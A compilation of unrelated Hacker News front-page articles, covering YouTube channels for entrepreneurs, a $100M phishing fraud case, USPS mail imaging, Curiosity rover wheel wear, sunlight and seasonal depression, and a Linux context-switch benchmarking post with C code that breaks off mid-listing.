HN Front Page - March 22

YouTube channels for entrepreneurs

Illustration by Lovely Creatures

I’m not the kind of guy who consumes typical entrepreneurship pep spam. I cringe whenever I hear the names Tim Ferriss, Gary Vaynerchuk or Mark Cuban, not because these people aren’t smart, but because the content associated with their names has become so commoditized it’s completely irrelevant to me.

Too often, content aimed at entrepreneurs is reduced to repeating well-worn catchphrases and habit improvement techniques. Disobedient entrepreneurs are a clever bunch who need clever insight. They want to be exposed to interesting ideas that change their perception of the world and make them feel giddy with the sense of discovery.

It’s this kind of entrepreneur — the disobedient kind — that we’d like to converse with over the pages of this blog. The kind that appreciates weird and feels talked down to by typical “10 habits that changed my life” articles. The kind that prefers sophistication to ease and discovery to the comfort zone.

YouTube is in general quite a populist platform, and straying off the beaten path isn’t always easy. Here are some YouTube channels I genuinely enjoy, and I think you might, too.

Startups

Y Combinator

Interviews with the likes of Mark Zuckerberg, office hours from the world’s top startup consultants and streams from startup conferences — this is a YouTube channel powered by Y Combinator’s extensive network.

How to Start a Startup

Cut-the-crap, actionable, real world advice by top tier startup founders on how to start a business, structured like an online course.

Khosla Ventures

Khosla is one of the best venture capital funds in the world, and its YouTube channel is chock-full of excellent interviews with its portfolio companies.

Work in Progress

Super authentic daily talks from Basecamp’s founder and CEO, Jason Fried, and Highrise’s CEO, Nathan Kontny.

If you enjoy Work in Progress, check out Nathan’s personal vlog about building his startup, Highrise.

Business

Some of the best business schools in the world have their own YouTube channels broadcasting interviews and classes. Worth a 👀.

Stanford Business School

Columbia Business School

Berkeley Haas Business School

Storytelling

Nerdwriter

Nerdwriter creates in-depth videos that explore different storytelling aspects and techniques in film, music and media. It’s fascinating, and the videos are exceptionally well made.

Minutephysics

This channel explains complex physics concepts in one minute of hand-drawn animation. It’s great to see how almost any idea can be boiled down into a one-minute, humorous YouTube video.

Design & development

Flux

A relatively little-known channel in a very well-known space: designer talk. In Flux, Ran Segall shares his design experience in vlog format, and it’s great.

DevTips

There aren’t many development-centric YouTube channels that are great for people who aren’t developers. DevTips is a rare find: super simple, yet super in-depth tutorials about everything programming.

TED Talks

You probably know TED Talks: videos of clever people sharing interesting ideas. Here are some ideas related directly to business and entrepreneurship.


Two major US technology firms 'tricked out of $100M'

Image caption: Evaldas Rimasauskas posed as an Asian-based hardware manufacturer to trick staff into wiring him money.

A Lithuanian man has been charged with tricking two US technology firms into wiring him $100m (£80.3m) through an email phishing scam.

Posing as an Asian-based manufacturer, Evaldas Rimasauskas tricked staff into transferring money into bank accounts under his control, US officials said.

The companies were not named but were described as US-based multinationals, with one operating in social media.

Officials called it a wake-up call for even "the most sophisticated" firms.

According to the US Department of Justice, Mr Rimasauskas, 48 - who was arrested in Lithuania last week - deceived the firms from at least 2013 up until 2015.

He allegedly registered a company in Latvia which bore the same name as an Asian-based computer hardware manufacturer and opened various accounts in its name at several banks.

The DoJ said: "Thereafter, fraudulent phishing emails were sent to employees and agents of the victim companies, which regularly conducted multimillion-dollar transactions with [the Asian] company."

The emails, which "purported" to be from employees and agents of the Asian firm, and were sent from fake email accounts, directed money for legitimate goods and services into Mr Rimasauskas's accounts, the DoJ said.

The cash was then "wired into different bank accounts" in locations around the world - including Latvia, Cyprus, Slovakia, Lithuania, Hungary and Hong Kong.

He also "forged invoices, contracts and letters" to hide his fraud from the banks he used.

Officials said Mr Rimasauskas siphoned off more than $100m in total, although much of the stolen money has been recovered.

Acting US Attorney Joon H Kim said: "This case should serve as a wake-up call to all companies... that they too can be victims of phishing attacks by cybercriminals.

"And this arrest should serve as a warning to all cybercriminals that we will work to track them down, wherever they are, to hold them accountable."


USPS Informed Delivery – Digital Images of Front of Mailpieces

Detailed Images of Your Incoming Mail

Participate in this new USPS® service enhancement test and get images of the mail that will be placed in your mailbox each day. Black and white images of your actual letter-sized mail pieces, processed by USPS® sorting equipment, will be provided to you each morning. Flat-sized pieces, such as catalogues or magazines, may be added in the future. Participation is limited to certain ZIP Codes™ at this time. See the FAQs for more details.

View Your Mail Online or Anywhere from Your Email

Get up to 10 mail piece images in your morning email, which can be viewed on any computer or smartphone. Get more mail than that? Additional images are available for viewing on your online dashboard - in the same place you track your packages! Don't worry if you are travelling; if you have email or online access, you can see much of the mail that will be delivered to your mailbox.


Breaks Observed in Rover Wheel Treads

Mars Science Laboratory Mission Status Report

A routine check of the aluminum wheels on NASA's Curiosity Mars rover has found two small breaks on the rover's left middle wheel, the latest sign of wear and tear as the rover continues its journey, now approaching the 10-mile (16-kilometer) mark.

The mission's first and second breaks in raised treads, called grousers, appeared in a March 19 image check of the wheels, documenting that these breaks occurred after the last check, on Jan. 27.

"All six wheels have more than enough working lifespan remaining to get the vehicle to all destinations planned for the mission," said Curiosity Project Manager Jim Erickson at NASA's Jet Propulsion Laboratory, Pasadena, California. "While not unexpected, this damage is the first sign that the left middle wheel is nearing a wheel-wear milestone,"

The monitoring of wheel damage on Curiosity, plus a program of wheel-longevity testing on Earth, was initiated after dents and holes in the wheels were seen to be accumulating faster than anticipated in 2013. Testing showed that at the point when three grousers on a wheel have broken, that wheel has reached about 60 percent of its useful life. Curiosity already has driven well over that fraction of the total distance needed for reaching the key regions of scientific interest on Mars' Mount Sharp.

Curiosity Project Scientist Ashwin Vasavada, also at JPL, said, "This is an expected part of the life cycle of the wheels and at this point does not change our current science plans or diminish our chances of studying key transitions in mineralogy higher on Mount Sharp."

Curiosity is currently examining sand dunes partway up a geological unit called the Murray formation. Planned destinations ahead include the hematite-containing "Vera Rubin Ridge," a clay-containing geological unit above that ridge, and a sulfate-containing unit above the clay unit.

The rover is climbing to sequentially higher and younger layers of lower Mount Sharp to investigate how the region's ancient climate changed billions of years ago. Clues about environmental conditions are recorded in the rock layers. During its first year on Mars, the mission succeeded at its main goal by finding that the region once offered environmental conditions favorable for microbial life, if Mars has ever hosted life. The conditions in long-lived ancient freshwater Martian lake environments included all of the key chemical elements needed for life as we know it, plus a chemical source of energy that is used by many microbes on Earth.

Through March 20, Curiosity has driven 9.9 miles (16.0 kilometers) since the mission's August 2012 landing on Mars. Studying the transition to the sulfate unit, the farthest-uphill destination, will require about 3.7 miles (6 kilometers) or less of additional driving. For the past four years, rover drive planners have used enhanced methods of mapping potentially hazardous terrains to reduce the pace of damage from sharp, embedded rocks along the rover's route.

Each of Curiosity's six wheels is about 20 inches (50 centimeters) in diameter and 16 inches (40 centimeters) wide, milled out of solid aluminum. The wheels contact ground with a skin that's about half as thick as a U.S. dime, except at thicker treads. The grousers are 19 zigzag-shaped treads that extend about a quarter inch (three-fourths of a centimeter) outward from the skin of each wheel. The grousers bear much of the rover's weight and provide most of the traction and ability to traverse over uneven terrain.

JPL, a division of Caltech in Pasadena, California, manages NASA's Mars Science Laboratory Project for NASA's Science Mission Directorate, Washington, and built the project's rover, Curiosity. For more information about the mission, visit:

http://mars.jpl.nasa.gov/msl/

News Media Contact

Guy Webster
Jet Propulsion Laboratory, Pasadena, Calif.
818-354-6278
guy.webster@jpl.nasa.gov

2017-079


The relationship between our moods and sunlight

Image caption: If it's dark outside seemingly all the time, you must find ways to cope.
How do Scandinavians deal with long, dark winters? For Mosaic, Linda Geddes explores what this might teach us about the relationship between our moods and sunlight. The story is republished here under a Creative Commons license.

The inhabitants of Rjukan in southern Norway have a complex relationship with the Sun. “More than other places I’ve lived, they like to talk about the Sun: when it’s coming back, if it’s a long time since they’ve seen the Sun,” says artist Martin Andersen. “They’re a little obsessed with it.” Possibly, he speculates, it’s because for approximately half the year, you can see the sunlight shining high up on the north wall of the valley: “It is very close, but you can’t touch it,” he says. As autumn wears on, the light moves higher up the wall each day, like a calendar marking off the dates to the winter solstice. And then as January, February, and March progress, the sunlight slowly starts to inch its way back down again.

Rjukan was built between 1905 and 1916, after an entrepreneur called Sam Eyde bought the local waterfall (known as the smoking waterfall) and constructed a hydroelectric power plant there. Factories producing artificial fertiliser followed. But the managers of these factories worried that their staff weren’t getting enough Sun—and eventually they constructed a cable car in order to give them access to it.

When Martin moved to Rjukan in August 2002, he was simply looking for a temporary place to settle with his young family that was close to his parents’ house and where he could earn some money. He was drawn to the three-dimensionality of the place: a town of 3,000, in the cleft between two towering mountains—the first seriously high ground you reach as you travel west of Oslo.

But the departing Sun left Martin feeling gloomy and lethargic. It still rose and set each day and provided some daylight—unlike in the far north of Norway, where it is dark for months at a time—but the Sun never climbed high enough for the people of Rjukan to actually see it or feel its warming rays directly on their skin.

As summer turned to autumn, Martin found himself pushing his two-year-old daughter’s buggy further and further down the valley each day, chasing the vanishing sunlight. “I felt it very physically; I didn’t want to be in the shade,” says Martin, who runs a vintage shop in Rjukan town centre. If only someone could find a way of reflecting some sunlight down into the town, he thought. Most people living at temperate latitudes will be familiar with Martin’s sense of dismay at autumn’s dwindling light. Few would have been driven to build giant mirrors above their town to fix it.

The greyness

What is it about the flat, gloomy greyness of winter that seems to penetrate our skin and dampen our spirits, at least at higher latitudes? The idea that our physical and mental health varies with the seasons and sunlight goes back a long way. The Yellow Emperor’s Classic of Medicine, a treatise on health and disease that’s estimated to have been written in around 300 BCE, describes how the seasons affect all living things and suggests that during winter—a time of conservation and storage—one should “retire early and get up with the sunrise... Desires and mental activity should be kept quiet and subdued, as if keeping a happy secret.” And in his Treatise on Insanity, published in 1806, the French physician Philippe Pinel noted a mental deterioration in some of his psychiatric patients “when the cold weather of December and January set in."

Today, this mild form of malaise is often called the winter blues. And for a minority of people who suffer from seasonal affective disorder (SAD), winter is quite literally depressing. First described in the 1980s, the syndrome is characterised by recurrent depressions that occur annually at the same time each year. Most psychiatrists regard SAD as being a subclass of generalised depression or, in a smaller proportion of cases, bipolar disorder.

Seasonality is reported by approximately 10 to 20 percent of people with depression and 15 to 22 percent of those with bipolar disorder. “People often don’t realise that there is a continuum between the winter blues—which is a milder form of feeling down, [sleepier and less energetic]—and when this is combined with a major depression,” says Anna Wirz-Justice, an emeritus professor of psychiatric neurobiology at the Centre for Chronobiology in Basel, Switzerland. Even healthy people who have no seasonal problems seem to experience this low-amplitude change over the year, with worse mood and energy during autumn and winter and an improvement in spring and summer, she says.

Why should darker months trigger this tiredness and low mood in so many people? There are several theories, none of them definitive, but most relate to the circadian clock—the roughly 24-hour oscillation in our behaviour and biology that influences when we feel hungry, sleepy or active. This is no surprise given that the symptoms of the winter blues seem to be associated with shortening days and longer nights and that bright light seems to have an antidepressive effect. One idea is that some people’s eyes are less sensitive to light, so once light levels fall below a certain threshold, they struggle to synchronise their circadian clock with the outside world. Another is that some people produce more of a hormone called melatonin during winter than in summer—just like certain other mammals that show strong seasonal patterns in their behaviour.

However, the leading theory is the ‘phase-shift hypothesis’: the idea that shortened days cause the timing of our circadian rhythms to fall out of sync with the actual time of day, because of a delay in the release of melatonin. Levels of this hormone usually rise at night in response to darkness, helping us to feel sleepy, and are suppressed by the bright light of morning. “If someone’s biological clock is running slow and that melatonin rhythm hasn’t fallen, then their clock is telling them to keep on sleeping even though their alarm may be going off and life is demanding that they wake up,” says Kelly Rohan, a professor of psychology at the University of Vermont. Precisely why this should trigger feelings of depression is still unclear. One idea is that this tiredness could then have unhealthy knock-on effects. If you’re having negative thoughts about how tired you are, this could trigger a sad mood, loss of interest in food, and other symptoms that could cascade on top of that.

However, recent insights into how birds and small mammals respond to changes in day length have prompted an alternative explanation. According to Daniel Kripke, an emeritus professor of psychiatry at the University of California, San Diego, when melatonin strikes a region of the brain called the hypothalamus, this alters the synthesis of another hormone—active thyroid hormone—that regulates all sorts of behaviours and bodily processes.

When dawn comes later in the winter, the end of melatonin secretion drifts later, says Kripke. From animal studies, it appears that high melatonin levels just after the time an animal wakes up strongly suppress the making of active thyroid hormone—and lowering thyroid levels in the brain can cause changes in mood, appetite, and energy. For instance, thyroid hormone is known to influence serotonin, a neurotransmitter that regulates mood. Several studies have shown that levels of brain serotonin in humans are at their lowest in the winter and highest in the summer. In 2016, scientists in Canada discovered that people with severe SAD show greater seasonal changes in a protein that terminates the action of serotonin than others with no or less severe symptoms, suggesting that the condition and the neurotransmitter are linked.

It’s possible that many of these mechanisms are at work, even if the precise relationships haven’t been fully teased apart yet. But regardless of what causes winter depression, bright light—particularly when delivered in the early morning—seems to reverse the symptoms.

"...collect the sunlight and then spread it like a headlamp beam over the town of Rjukan and its merry inhabitants."
Enlarge / "...collect the sunlight and then spread it like a headlamp beam over the town of Rjukan and its merry inhabitants."

“I like the Sun”

It was a bookkeeper called Oscar Kittilsen who first came up with the idea of erecting large rotatable mirrors on the northern side of the valley, where they would be able to “first collect the sunlight and then spread it like a headlamp beam over the town of Rjukan and its merry inhabitants."

A month later, on November 28, 1913, a newspaper story described Sam Eyde pushing the same idea, although it was another hundred years before it was realised. Instead, in 1928 Norsk Hydro erected a cable car as a gift to the townspeople, so that they could get high enough to soak up some sunlight in winter. Instead of bringing the Sun to the people, the people would be brought to the sunshine.

Martin Andersen didn’t know all of this. But after receiving a small grant from the local council to develop the idea, he learned about this history and started to develop some concrete plans. These involved a heliostat: a mirror mounted in such a way that it turns to keep track of the Sun while continually reflecting its light down toward a set target—in this case, Rjukan town square.

The three mirrors, each measuring 17 m², stand proud upon the mountainside above the town. In January, the Sun is only high enough to bring light to the square for two hours per day, from midday until 2pm, but the beam produced by the mirrors is golden and welcoming. Stepping into the sunlight after hours in permanent shade, I become aware of just how much it shapes our perception of the world. Suddenly, things seem more three-dimensional; I feel transformed into one of those ‘merry inhabitants’ that Kittilsen imagined. When I leave the sunlight, Rjukan feels a flatter, greyer place.

As far back as the sixth century, historians were describing seasonal peaks of joy and sorrow among Scandinavians, brought about by the continuous daylight of summer and its almost complete absence in winter.

Three hundred and fifty miles south of Rjukan, and at roughly the same latitude as Edinburgh, Moscow, and Vancouver, lies Malmö in southern Sweden. In Sweden, an estimated 8 percent of the population suffers from SAD, with a further 11 percent said to suffer the winter blues.

In early January, the Sun rises at around 8:30am and sets just before 4pm. For Anna Odder Milstam, an English and Swedish teacher, this means getting up and arriving at work before dawn for several months of the year. “During the winter, we just feel so tired,” she says. “The children struggle with it as well. They are less alert and less active at this time of year.”

Anna picks me up from my city-centre hotel at 7:45am. It’s early January and still dark, but as dawn begins to break it reveals a leaden sky and the threat of snow. I ask if she’s a winter person and she visibly shudders. “No, I am not,” she replies stiffly. “I like the Sun.”

Lindeborg School, where Anna teaches, caters for approximately 700 pupils, ranging from preschool age through to 16. Since there’s little the school can do about its high latitude and brooding climate, the local authority is instead trying to recreate the psychological effects of sunshine on its pupils artificially.

When I walk into Anna’s classroom at 8:50am, my eyes instinctively crinkle, and I feel myself recoiling. It’s as if someone has thrown open the curtains on a darkened bedroom. Yet as my eyes adjust to the bright light, I see the curtains in this classroom are firmly closed. In front of me sits a class of 14-year-olds at evenly spaced desks, watching my reaction with mild amusement. They’re part of an experiment investigating whether artificial lighting can improve their alertness and sleep and ultimately result in improved grades.

“We can all feel that if we’re not very alert at school or work, we don’t perform at our top level,” says Olle Strandberg, a developer at Malmö’s Department of Internal Services, which is leading the project. “So if there is any possibility of waking the students up during the wintertime, we’re keen to take it.”

Since October 2015, Anna’s classroom has been fitted with ceiling lights that change in colour and intensity to simulate being outside on a bright day in springtime. Developed by a company called BrainLit, the ultimate goal is to create a system that is tailored to the individual, monitoring the type of light they’ve been exposed to through the course of a day and then adjusting the lights to optimise their health and productivity.

When Anna’s pupils enter the classroom at 8:10am, the lights are a bright bluish-white to wake them up. They then grow gradually more intense as the morning progresses, dimming slightly in the run-up to lunch to ease the transition to the gloomier light outside. Immediately after lunch the classroom is intense whitish-blue again—“to combat the post-lunch coma” jokes Strandberg—but then the lights gradually dim and become more yellow as the afternoon progresses.

Bright light in the morning suppresses any residual melatonin that could be making us sleepy and provides a signal to the brain’s master clock that keeps it synchronised with the 24-hour cycle of light and dark. The idea is it therefore strengthens our internal rhythms so that when night comes around again, we start to feel sleepy at the correct time.

Already, there’s some preliminary evidence that it’s having an effect on the pupils’ sleep. In a small pilot study, 14 pupils from Anna’s class and 14 from a neighbouring class that doesn’t have the lighting system were given Jawbone activity trackers and asked to keep sleep diaries for two weeks. During the second week, significant differences started to emerge between the two groups in terms of their sleep, with Anna’s pupils waking up fewer times during the night and spending a greater proportion of their time in bed asleep.

No one knows whether the lighting system is affecting the students’ exam scores or even how to measure that. But it might. Besides suppressing melatonin and warding off any residual sleepiness, recent studies suggest that bright light acts as a stimulant to the brain. Gilles Vandewalle and colleagues at the University of Liège in Belgium asked volunteers to perform various tasks in a brain scanner while exposing them to pulses of bright white light or no light. After exposure to white light, the brain was in a more active state in those areas that were involved in the task. Although they didn’t measure the volunteers’ test performances directly, if you are able to recruit a greater brain response, then your performance is likely to be better: you will be faster or more accurate, Vandewalle says.

Anna agrees. Anecdotally, she reports that her students are more alert. “They’ve expressed that they feel more able to concentrate and they are more focused,” she says. “I also look forward to going into my classroom in the morning, because I’ve noticed that I feel better when I go in there—more awake.”


How long does it take to make a context switch? (2010)

That's an interesting question I'm willing to spend some of my time on. Someone at StumbleUpon floated the hypothesis that with all the improvements in the Nehalem architecture (marketed as Intel i7), context switching would be much faster. How would you devise a test to empirically find an answer to this question? How expensive are context switches anyway? (tl;dr answer: very expensive)

The lineup

April 21, 2011 update: I added an "extreme" Nehalem and a low-voltage Westmere.
April 1, 2013 update: Added an Intel Sandy Bridge E5-2620.
I've put 4 different generations of CPUs to test:
  • A dual Intel 5150 (Woodcrest, based on the old "Core" architecture, 2.67GHz). The 5150 is a dual-core, and so in total the machine has 4 cores available. Kernel: 2.6.28-19-server x86_64.
  • A dual Intel E5440 (Harpertown, based on the Penrynn architecture, 2.83GHz). The E5440 is a quad-core so the machine has a total of 8 cores. Kernel: 2.6.24-26-server x86_64.
  • A dual Intel E5520 (Gainestown, based on the Nehalem architecture, aka i7, 2.27GHz). The E5520 is a quad-core, and has HyperThreading enabled, so the machine has a total of 8 cores or 16 "hardware threads". Kernel: 2.6.28-18-generic x86_64.
  • A dual Intel X5550 (Gainestown, based on the Nehalem architecture, aka i7, 2.67GHz). The X5550 is a quad-core, and has HyperThreading enabled, so the machine has a total of 8 cores or 16 "hardware threads". Note: the X5550 is in the "server" product line. This CPU is 3x more expensive than the previous one. Kernel: 2.6.28-15-server x86_64.
  • A dual Intel L5630 (Gulftown, based on the Westmere architecture, aka i7, 2.13GHz). The L5630 is a quad-core, and has HyperThreading enabled, so the machine has a total of 8 cores or 16 "hardware threads". Note: the L5630 is a "low-voltage" CPU. At equal price, this CPU is in theory 16% less powerful than a non-low-voltage CPU. Kernel: 2.6.32-29-server x86_64.
  • A dual Intel E5-2620 (Sandy Bridge-EP, based on the Sandy Bridge architecture, aka E5, 2GHz). The E5-2620 is a hexa-core and has HyperThreading, so the machine has a total of 12 cores, or 24 "hardware threads". Kernel: 3.4.24 x86_64.
As far as I can tell, all CPUs are set to a constant clock rate (no Turbo Boost or anything fancy). All the Linux kernels are those built and distributed by Ubuntu.

First idea: with syscalls (fail)

My first idea was to make a cheap system call many times in a row, time how long it took, and compute the average time spent per syscall. The cheapest system call on Linux these days seems to be gettid. Turns out, this was a naive approach: system calls don't actually cause a full context switch anymore these days, because the kernel can get away with a "mode switch" (go from user mode to kernel mode, then back to user mode). That's why when I ran my first test program, vmstat wouldn't show a noticeable increase in the number of context switches. But this test is interesting too, although it's not what I wanted originally.
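
For reference, here is a minimal sketch of that first approach (an illustration of the idea, not the actual timesyscall.c; the iteration count and the use of clock_gettime are my own choices): issue a cheap syscall in a tight loop and average the elapsed time per call.

#define _GNU_SOURCE
#include <sys/syscall.h>
#include <unistd.h>
#include <stdio.h>
#include <time.h>

int main(void) {
    const long iterations = 10 * 1000 * 1000;
    struct timespec start, end;

    clock_gettime(CLOCK_MONOTONIC, &start);
    for (long i = 0; i < iterations; i++)
        syscall(SYS_gettid);   /* cheap syscall: only a mode switch, no reschedule */
    clock_gettime(CLOCK_MONOTONIC, &end);

    long ns = (end.tv_sec - start.tv_sec) * 1000000000L
            + (end.tv_nsec - start.tv_nsec);
    printf("%ld ns/syscall\n", ns / iterations);
    return 0;
}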

Source code: timesyscall.c Results:

  • Intel 5150: 105ns/syscall
  • Intel E5440: 87ns/syscall
  • Intel E5520: 58ns/syscall
  • Intel X5550: 52ns/syscall
  • Intel L5630: 58ns/syscall
  • Intel E5-2620: 67ns/syscall
Now that's nice, more expensive CPUs perform noticeably better (note however the slight increase in cost on Sandy Bridge). But that's not really what we wanted to know. So to test the cost of a context switch, we need to force the kernel to de-schedule the current process and schedule another one instead. And to benchmark the CPU, we need to get the kernel to do nothing but this in a tight loop. How would you do this?

Second idea: with futex

The way I did it was to abuse futex (RTFM). futex is the low level Linux-specific primitive used by most threading libraries to implement blocking operations such as waiting on a contended mutexes, semaphores that run out of permits, condition variables and friends. If you would like to know more, go read Futexes Are Tricky by Ulrich Drepper. Anyways, with a futex, it's easy to suspend and resume processes. What my test does is that it forks off a child process, and the parent and the child take turn waiting on the futex. When the parent waits, the child wakes it up and goes on to wait on the futex, until the parent wakes it and goes on to wait again. Some kind of a ping-pong "I wake you up, you wake me up...".
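
To make the mechanism concrete, here is a hedged sketch of such a futex ping-pong (an approximation of the approach, not the actual timectxsw.c; the futex() wrapper, iteration count and lack of error handling are my own simplifications). Parent and child share one futex word in anonymous shared memory and take turns blocking on it, so every iteration forces two context switches.

#define _GNU_SOURCE
#include <linux/futex.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <time.h>

static int futex(int *uaddr, int op, int val) {
    return syscall(SYS_futex, uaddr, op, val, NULL, NULL, 0);
}

int main(void) {
    const long iterations = 500000;
    /* One shared 32-bit word, visible to both parent and child. */
    int *ftx = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE,
                    MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    *ftx = 0;

    struct timespec start, end;
    clock_gettime(CLOCK_MONOTONIC, &start);

    if (fork() == 0) {                      /* child: wait for 1, hand back 0 */
        for (long i = 0; i < iterations; i++) {
            while (*ftx != 1)
                futex(ftx, FUTEX_WAIT, 0);  /* sleep while the word is 0 */
            *ftx = 0;
            futex(ftx, FUTEX_WAKE, 1);
        }
        _exit(0);
    }
    for (long i = 0; i < iterations; i++) { /* parent: hand over 1, wait for 0 */
        *ftx = 1;
        futex(ftx, FUTEX_WAKE, 1);
        while (*ftx != 0)
            futex(ftx, FUTEX_WAIT, 1);      /* sleep while the word is 1 */
    }
    wait(NULL);

    clock_gettime(CLOCK_MONOTONIC, &end);
    long ns = (end.tv_sec - start.tv_sec) * 1000000000L
            + (end.tv_nsec - start.tv_nsec);
    /* Each iteration costs two switches (parent -> child and back). */
    printf("~%ld ns/context switch\n", ns / (iterations * 2));
    return 0;
}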

Source code: timectxsw.c Results:

  • Intel 5150: ~4300ns/context switch
  • Intel E5440: ~3600ns/context switch
  • Intel E5520: ~4500ns/context switch
  • Intel X5550: ~3000ns/context switch
  • Intel L5630: ~3000ns/context switch
  • Intel E5-2620: ~3000ns/context switch
Note: those results include the overhead of the futex system calls.

Now you must take those results with a grain of salt. The micro-benchmark does nothing but context switching. In practice context switching is expensive because it screws up the CPU caches (L1, L2, L3 if you have one, and the TLB – don't forget the TLB!).

CPU affinity

Things are harder to predict in an SMP environment, because the performance can vary wildly depending on whether a task is migrated from one core to another (especially if the migration is across physical CPUs). I ran the benchmarks again but this time I pinned the processes/threads on a single core (or "hardware thread"). The performance speedup is dramatic.
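
For completeness, here is a minimal sketch of one way to do the pinning from inside the benchmark itself, using sched_setaffinity (the pin_to_cpu helper is hypothetical; in these tests the pinning is driven by cpubench.sh, and the same effect can be had from the shell with taskset):

#define _GNU_SOURCE
#include <sched.h>

/* Pin the calling process (and anything it forks afterwards) to one
 * logical CPU, so the ping-pong never migrates between cores. */
static int pin_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof(set), &set);  /* 0 = calling process */
}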

Source code: cpubench.sh Results:

  • Intel 5150: ~1900ns/process context switch, ~1700ns/thread context switch
  • Intel E5440: ~1300ns/process context switch, ~1100ns/thread context switch
  • Intel E5520: ~1400ns/process context switch, ~1300ns/thread context switch
  • Intel X5550: ~1300ns/process context switch, ~1100ns/thread context switch
  • Intel L5630: ~1600ns/process context switch, ~1400ns/thread context switch
  • Intel E5-2620: ~1600ns/process context switch, ~1300ns/thread context switch
Performance boost: 5150: 66%, E5440: 65-70%, E5520: 50-54%, X5550: 55%, L5630: 45%, E5-2620: 45%.

The performance gap between thread switches and process switches seems to increase with newer CPU generations (5150: 7-8%, E5440: 5-15%, E5520: 11-20%, X5550: 15%, L5630: 13%, E5-2620: 19%). Overall the penalty of switching from one task to another remains very high. Bear in mind that those artificial tests do absolutely zero computation, so they probably have 100% cache hit in L1d and L1i. In the real world, switching between two tasks (threads or processes) typically incurs significantly higher penalties due to cache pollution. But we'll get back to this later.

Threads vs. processes

After producing the numbers above, I quickly criticized Java applications, because it's fairly common to create shitloads of threads in Java, and the cost of context switching becomes high in such applications. Someone retorted that, yes, Java uses lots of threads but threads have become significantly faster and cheaper with the NPTL in Linux 2.6. They said that normally there's no need to do a TLB flush when switching between two threads of the same process. That's true, you can go check the source code of the Linux kernel (switch_mm in mmu_context.h):
static inline void switch_mm(struct mm_struct *prev, struct mm_struct *next,
                             struct task_struct *tsk)
{
       unsigned cpu = smp_processor_id();

       if (likely(prev != next)) {
               [...]
               load_cr3(next->pgd);
       } else {
               [don't typically reload cr3]
       }
}
In this code, the kernel expects to be switching between tasks that have different memory structures, in which case it updates CR3, the register that holds a pointer to the page table. Writing to CR3 automatically causes a TLB flush on x86.

In practice though, with the default kernel scheduler and a busy server-type workload, it's fairly infrequent to go through the code path that skips the call to load_cr3. Plus, different threads tend to have different working sets, so even if you skip this step, you still end up polluting the L1/L2/L3/TLB caches. I re-ran the benchmark above with 2 threads instead of 2 processes (source: timetctxsw.c) but the results aren't significantly different (this varies a lot depending on scheduling and luck, but on average on many runs it's typically only 100ns faster to switch between threads if you don't set a custom CPU affinity).
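
As an aside, here is a hedged sketch of a thread-to-thread ping-pong (not the author's timetctxsw.c, which presumably drives the futex directly; this version uses a pthread mutex and condition variable, which adds its own overhead but forces the same kind of switches between two threads of one process):

#include <pthread.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_cond_t  cond = PTHREAD_COND_INITIALIZER;
static int turn = 0;                        /* 0 = main thread's turn, 1 = worker's */
static const long iterations = 500000;

static void *worker(void *arg) {
    (void)arg;
    pthread_mutex_lock(&lock);
    for (long i = 0; i < iterations; i++) {
        while (turn != 1)
            pthread_cond_wait(&cond, &lock);  /* block until it's our turn */
        turn = 0;
        pthread_cond_signal(&cond);           /* hand control back */
    }
    pthread_mutex_unlock(&lock);
    return NULL;
}

int main(void) {
    pthread_t tid;
    pthread_create(&tid, NULL, worker, NULL);
    pthread_mutex_lock(&lock);
    for (long i = 0; i < iterations; i++) {
        turn = 1;
        pthread_cond_signal(&cond);
        while (turn != 0)
            pthread_cond_wait(&cond, &lock);  /* block until the worker is done */
    }
    pthread_mutex_unlock(&lock);
    pthread_join(tid, NULL);
    return 0;
}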

Indirect costs in context switches: cache pollution

The results above are in line with a paper published by a bunch of guys from the University of Rochester: Quantifying The Cost of Context Switch. On an unspecified Intel Xeon (the paper was written in 2007, so the CPU was probably not too old), they end up with an average time of 3800ns. They use another method I thought of, which involves writing / reading 1 byte to / from a pipe to block / unblock a couple of processes. I thought that (ab)using futex would be better since futex is essentially exposing some scheduling interface to userland.

The paper goes on to explain the indirect costs involved in context switching, which are due to cache interference. Beyond a certain working set size (about half the size of the L2 cache in their benchmarks), the cost of context switching increases dramatically (by 2 orders of magnitude).

I think this is a more realistic expectation. Not sharing data between threads leads to optimal performance, but it also means that every thread has its own working set and that when a thread is migrated from one core to another (or worse, across physical CPUs), the cache pollution is going to be costly. Unfortunately, when an application has many more active threads than hardware threads, this is happening all the time. That's why not creating more active threads than there are hardware threads available is so important, because in this case it's easier for the Linux scheduler to keep re-scheduling the same threads on the core they last used ("weak affinity").

Having said that, these days, our CPUs have much larger caches, and can even have an L3 cache.

  • 5150: L1i & L1d = 32K each, L2 = 4M
  • E5440: L1i & L1d = 32K each, L2 = 6M
  • E5520: L1i & L1d = 32K each, L2 = 256K/core, L3 = 8M (same for the X5550)
  • L5630: L1i & L1d = 32K each, L2 = 256K/core, L3 = 12M
  • E5-2620: L1i & L1d = 64K each, L2 = 256K/core, L3 = 15M
Note that in the case of the E5520/X5550/L5630 (the ones marketed as "i7") as well as the Sandy Bridge E5-2620, the L2 cache is tiny but there's one L2 cache per core (with HT enabled, this gives us 128K per hardware thread). The L3 cache is shared for all cores that are on each physical CPU.

Having more cores is great, but it also increases the chance that your task be rescheduled onto a different core. The cores have to "migrate" cache lines around, which is expensive. I recommend reading What Every Programmer Should Know About Main Memory by Ulrich Drepper (yes, him again!) to understand more about how this works and the performance penalties involved.

So how does the cost of context switching increase with the size of the working set? This time we'll use another micro-benchmark, timectxswws.c, that takes as an argument the number of pages to use as a working set. This benchmark is exactly the same as the one used earlier to test the cost of context switching between two processes, except that now each process does a memset on the working set, which is shared across both processes. Before starting, the benchmark times how long it takes to write over all the pages in the working set size requested. This time is then discounted from the total time taken by the test. This attempts to estimate the overhead of overwriting pages across context switches.
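
The shape of that extra step is roughly as follows (an assumed sketch, not the actual timectxswws.c; the helper names and the 0xAB fill value are mine): the working set is mapped shared between the two processes, and each side overwrites all of it before handing the futex back, so every switch also has to repopulate the caches and TLB.

#define _GNU_SOURCE
#include <string.h>
#include <sys/mman.h>

#define PAGE_SIZE 4096

/* Map a working set of npages shared pages, visible to parent and child. */
static char *alloc_working_set(size_t npages) {
    return mmap(NULL, npages * PAGE_SIZE, PROT_READ | PROT_WRITE,
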